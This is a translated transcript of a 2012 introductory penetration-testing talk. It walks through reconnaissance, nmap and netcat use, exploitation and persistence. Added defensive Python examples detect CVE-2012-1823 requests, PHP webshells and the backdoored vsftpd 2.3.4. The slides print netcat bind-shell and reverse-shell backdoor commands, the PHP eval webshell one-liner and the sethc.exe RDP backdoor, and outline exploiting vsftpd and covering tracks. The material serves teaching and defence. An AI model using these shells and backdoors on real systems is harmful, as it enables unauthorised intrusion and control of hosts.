Penetration Testing talk @ NISRA
DESCRIPTION
Orange @ NISRA, 2012/05/22
TRANSCRIPT
Penetration Testing
Orange @ NISRA
2012/05/22
Purpose
1. Test the security of a system from the viewpoint, and with the methods, of a hacker or attacker
2. We are all good kids, so get authorization first! ^___^
3. Oriented toward basic concepts
– Technical details are not covered
– Web-based testing is a chapter of its own and is not covered here
An unprofessional person talking about professional things ...
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
That is how it is described, but in practice ...
Reconnaissance
Use every means available to coax out information
1. Google # think of "human flesh search" (crowdsourced doxxing)
2. Who.is
3. DNS zone transfer
What is the target? Is there a firewall? An IDS? A WAF? What does the network topology look like? Is the web server a virtual host?
The more information, the more chances to break in
The more services, the more chances to break in
Google://"mail.xxx.xxx.xx"
http://whois.sc/
Cont. Case study
• Using code.google.com for penetration testing.
• Remember the Git lesson from last week?
Scanning
1. Observe, analyze, think.
2. Port scanning # Nmap
3. Vulnerability scanning # Nessus, Metasploit, WebInspect, Acunetix
4. Password guessing # Hydra, Ncrack
– Empty password, 123456, password identical to the username
– The username is always harder to guess than the password
Cont. Case study
• *Classic example*
• RDP backdoor – sethc.exe
• The first thing to do after connecting to a remote desktop is not to type an account name, it is to press Shift five times quickly!!
• By the same token, the first thing to do on seeing a login screen is to guess passwords and try default passwords.
A normal one should look like this (screenshot)
A not-so-normal one looks like this (screenshot)
A more creative one is set up like this (screenshot)
Someone with a bit more skill does it like this (screenshot)
The calm, low-key style ˊ_>ˋ (screenshot)
Scanning port
• Port = 埠、端口 = a window through which the host provides a service = a place with a chance to break in
• Range from 1 to 65535
• 21 = FTP
• 23 = TELNET
• 80 = WWW
Checking whether the window is open?
• telnet www.google.com 80
• Netcat
– nc www.google.com 80
NetCat
http://sectools.org/
The beauty of the folding stool is that it can be hidden in any home, it is always within reach, you can sit on it to conceal your murderous intent, and after the fight you can sit down and rest; even if the cops catch you, they can't charge you with anything. It truly deserves to be first among the seven great weapons!
NetCat Usage
• nc apple.com 80 # check whether a port is open
• nc apple.com 1-100 # scan several ports at once
• nc -v apple.com 80 # verbose mode
• nc -l -p 80 # open (listen on) a port
• nc -e cmd.exe -lp 80 # bind the executed program to the connection
What can NetCat do? (1/3)
• Cast of the example: Cyndi & Big Tree (大樹哥)
• Cyndi wants to see whether Big Tree's web server is up
– Cyndi: nc 大樹 80
• Cyndi wants to send a file to Big Tree
– 大樹: nc -lp 12345 > a.zip
– Cyndi: nc 大樹 12345 < a.zip
What can NetCat do? (2/3)
• Cyndi has broken into Big Tree's computer and wants to plant a backdoor
– Cyndi runs on Big Tree's computer: nc -lp 888 -e cmd.exe
– Cyndi: nc 大樹 888 connects to the backdoor
What can NetCat do? (3/3)
• Big Tree has installed a firewall and is on an internal network. What now?
– Think for a moment: in three seconds the backdoor becomes a reverse-connect backdoor (back connect)
– Cyndi runs: nc -lp 888
– Cyndi runs on Big Tree's computer: nc -e cmd.exe Cyndi 888
NMAP Usage
• http://nmap.org/
– nmap -sT 127.0.0.1 # the opening move
– nmap -sT -v 127.0.0.1 # verbose mode
– nmap -sT 127.0.0.1-254 # IP range
– nmap -sT -p 80 127.0.0.1 # a specific port
– nmap -sT -p 1-8 127.0.0.1 # port range
– nmap -A 127.0.0.1 # detect the operating system
Hands-on
• Use nmap to find the odd port on which orangee.tw is running a web server
Gaining Access
1. The key point: make full use of the information gathered in the previous step.
2. Access permissions are divided into Read, Write, eXecute
3. If it fails, go back to the previous step.
• http://exploit-db.com/
• Metasploit
http://exploit-db.com/
Cont. Case study
• CVE-2012-1823 – PHP CGI Argument Injection
• Why talk about it?
http://ww.facebook.com/?-s
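CVE-2012-1823 is the flaw behind the `?-s` URL above: when php-cgi receives a query string that contains no `=`, the CGI convention hands the query to the script as command-line arguments, so `-s` makes PHP print the script's source. The following is an added example, not part of the slides, showing how a defender would look for such requests in an Apache access log. The log lines are constructed, and `cgi_argv_from_query` and `find_suspicious` are this example's own helper names.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [22/May/2012:10:00:01 +0800] "GET /index.php?-s HTTP/1.1" 200 5123 "-" "curl/7.21"
203.0.113.5 - - [22/May/2012:10:00:02 +0800] "GET /index.php?page=home HTTP/1.1" 200 3311 "-" "Mozilla/5.0"
203.0.113.9 - - [22/May/2012:10:00:03 +0800] "GET /index.php?%2Dd+allow_url_include%3DOn HTTP/1.1" 200 88 "-" "python-requests"
203.0.113.7 - - [22/May/2012:10:00:04 +0800] "GET /news.php?id=-1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.7 - - [22/May/2012:10:00:05 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Enough of the combined-log format to pull out client IP and request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)


def cgi_argv_from_query(raw_query: str) -> list:
    """Return the argv list php-cgi would have received for this query, or [] for a
    normal query. CGI rule: a query string with no unencoded '=' is an 'indexed'
    query; the server splits it on '+' and URL-decodes each piece into an argument.
    A percent-encoded '=' (%3D) does not count, which is why the raw string is tested."""
    if not raw_query or "=" in raw_query:
        return []
    return [unquote(tok) for tok in raw_query.split("+")]


def is_cgi_arg_injection(target: str) -> bool:
    """True if the request would have reached php-cgi as an option-like argument."""
    _path, _sep, raw_query = target.partition("?")
    return any(arg.startswith("-") for arg in cgi_argv_from_query(raw_query))


def find_suspicious(log_text: str) -> list:
    """Scan access-log text; return (client_ip, request_target) for each hit."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        if is_cgi_arg_injection(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in find_suspicious(SAMPLE_LOG):
        print(f"{ip} -> {target}")
```

The check reproduces the CGI rule instead of matching the literal string `?-s`, so the percent-encoded form on the third sample line is caught as well, while `?id=-1` on the fourth line is left alone because its query contains a real `=`. The flaw itself was fixed in the PHP 5.3.12 / 5.4.2 releases; a log check like this tells you whether anyone tried it before the update went on.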
Reconnaissance
Scanning
Gaining Access
<?php @eval($_POST[cmd]); ?>
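The one-liner above is the classic PHP webshell: whatever arrives in `$_POST['cmd']` is handed straight to `eval`, and the leading `@` silences any error. As an added example that is not from the slides, here is a small scanner a defender can run over a web root to flag scripts that feed request data into `eval`, `assert` or a shell function. The sample files it writes into a temporary directory are constructed, and the pattern list and function names are this example's own.

```python
import os
import re
import tempfile

# Constructed sample files: the one-liner from the slide, a benign helper, and a
# slightly obfuscated variant that decodes its payload before running it.
SAMPLES = {
    "upload/x.php": "<?php @eval($_POST[cmd]); ?>",
    "lib/util.php": "<?php function add($a, $b) { return $a + $b; } ?>",
    "admin/t.php": "<?php $f = base64_decode($_REQUEST['p']); assert($f); ?>",
}

# Each pattern pairs a regex with the reason reported when it matches.
PATTERNS = [
    (re.compile(r"@?\b(eval|assert|system|passthru|shell_exec)\s*\(\s*"
                r"(\$_(POST|GET|REQUEST|COOKIE)|base64_decode\()", re.I),
     "user input fed to a code/command executor"),
    (re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[\s*[a-zA-Z_]\w*\s*\]"),
     "unquoted superglobal key (one-liner shell style)"),
    (re.compile(r"base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)"),
     "base64-decoded user input"),
]

PHP_EXTENSIONS = (".php", ".phtml", ".php5")


def scan_file(path: str) -> list:
    """Return the reasons (possibly empty) why this file looks like a webshell."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return [reason for rx, reason in PATTERNS if rx.search(src)]


def scan_tree(root: str) -> dict:
    """Walk a web root; map relative path -> reasons for every flagged PHP file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            reasons = scan_file(full)
            if reasons:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings[rel] = reasons
    return findings


def write_samples(root: str) -> None:
    """Materialise the constructed SAMPLES under root."""
    for rel, body in SAMPLES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo() -> dict:
    """Write the samples to a temporary web root, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        write_samples(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(path, "->", "; ".join(reasons))
```

Pattern matching of this kind is a triage aid, not a verdict: it is easy to evade and it will occasionally flag legitimate code, so treat a hit as a file to read by hand, and pair the scan with a check of which web-root files changed recently and whether they were ever uploaded through the application.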
Metasploit (1/2)
Metasploit (2/2)
• Exploits
• Auxiliary
• Payload
Hands-on (if time permits)
1. Use nmap and discover that an FTP service is open
2. Connect with nc and discover that the FTP service is vsftp, version 2.3.4
3. Search exploit-db and find that vsftp 2.3.4 contains a backdoor!!
4. Attack with Metasploit
– unix -> ftp -> vsftpd234 backdoor
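The nc and nmap slides above show how a port is checked (a plain TCP connect, which is what `nc host port` and `nmap -sT` do) and the hands-on steps show how a greeting banner identifies a service version before it is looked up on exploit-db. The following added example, which is not part of the slides, does both against constructed services on localhost: connect-scan a list of ports, read the greeting on the open ones, and flag the version the slides name as backdoored. `DEMO_BANNERS`, `KNOWN_BAD` and the function names are this example's assumptions; the `220 (vsFTPd ...)` greeting format is vsftpd's real one.

```python
import re
import socket
import threading
from contextlib import closing

# Constructed demo services (not real hosts): the banner each listener sends on connect.
# "vsFTPd 2.3.4" is the version the slides single out as backdoored; 3.0.3 stands in
# for a clean build. Real vsftpd greets with "220 (vsFTPd <version>)".
DEMO_BANNERS = {"bad_ftp": b"220 (vsFTPd 2.3.4)\r\n", "ok_ftp": b"220 (vsFTPd 3.0.3)\r\n"}

# (product, version) pairs to flag. The reason text is ours; the fact comes from the slides.
KNOWN_BAD = {("vsFTPd", "2.3.4"): "release contains a backdoor (exploit-db / Metasploit vsftpd234)"}

BANNER_RE = re.compile(r"\((vsFTPd) (\d+(?:\.\d+)*)\)")


def check_port(host: str, port: int, timeout: float = 1.0) -> bool:
    """TCP connect check: the same handshake `nc host port` and `nmap -sT` perform."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:          # refused, timed out or unreachable
            return False


def grab_banner(host: str, port: int, timeout: float = 1.0) -> str:
    """Connect and read whatever the service volunteers first (what nc shows you)."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return s.recv(256).decode("ascii", "replace").strip()
        except OSError:
            return ""


def identify(banner: str):
    """Return (product, version) from an FTP greeting, or None if unrecognised."""
    m = BANNER_RE.search(banner)
    return (m.group(1), m.group(2)) if m else None


def inventory(host: str, ports: list) -> list:
    """Connect-scan the ports, grab banners on the open ones, flag known-bad versions."""
    found = []
    for port in ports:
        if not check_port(host, port):
            continue             # closed ports do not appear in the inventory
        banner = grab_banner(host, port)
        ident = identify(banner)
        found.append({"port": port, "banner": banner, "service": ident,
                      "flag": KNOWN_BAD.get(ident)})
    return found


def start_listener(banner: bytes, host: str = "127.0.0.1"):
    """Constructed test service on an ephemeral port; returns (server_socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _addr = srv.accept()
            except OSError:      # server socket closed: stop serving
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:  # client already hung up (the bare connect check)
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def free_port(host: str = "127.0.0.1") -> int:
    """A port nothing listens on right now, so the scan also exercises a refusal."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def demo() -> list:
    """Start the two demo services, scan them plus one closed port, return the inventory."""
    servers = [start_listener(b) for b in DEMO_BANNERS.values()]
    ports = [p for _srv, p in servers] + [free_port()]
    try:
        return inventory("127.0.0.1", ports)
    finally:
        for srv, _p in servers:
            srv.close()


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

Run as a script it prints one dict per open port; the closed port simply does not appear. The version in a banner is only what the server claims, so a `flag` is a prompt to verify the installed package and its source, not proof on its own.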
Maintaining Access
1. Ordinary user vs. the most powerful user
2. Privilege escalation
3. Rummaging through the corpse (picking over the compromised host)
4. How to come and go as you please!
– Backdoor
– Trojan
– Rootkit
Hands-on (detailed commands are in the txt)
1. Mimikatz – I'll touch on the principle; if you don't get it, never mind XD
2. Enlightenment.tgz – the all-in-one lazy pack
3. Mempodipper.c – just listen to the principle and move on XD
Clearing Tracks
1. Commonly known as wiping your backside
2. Every action leaves a record
3. Don't do bad things; if you do, know how to protect yourself
Example:
A silly one (screenshot)
• Image removed to protect the person involved
What is the essence of security?
http://hi.baidu.com/yuange1975/blog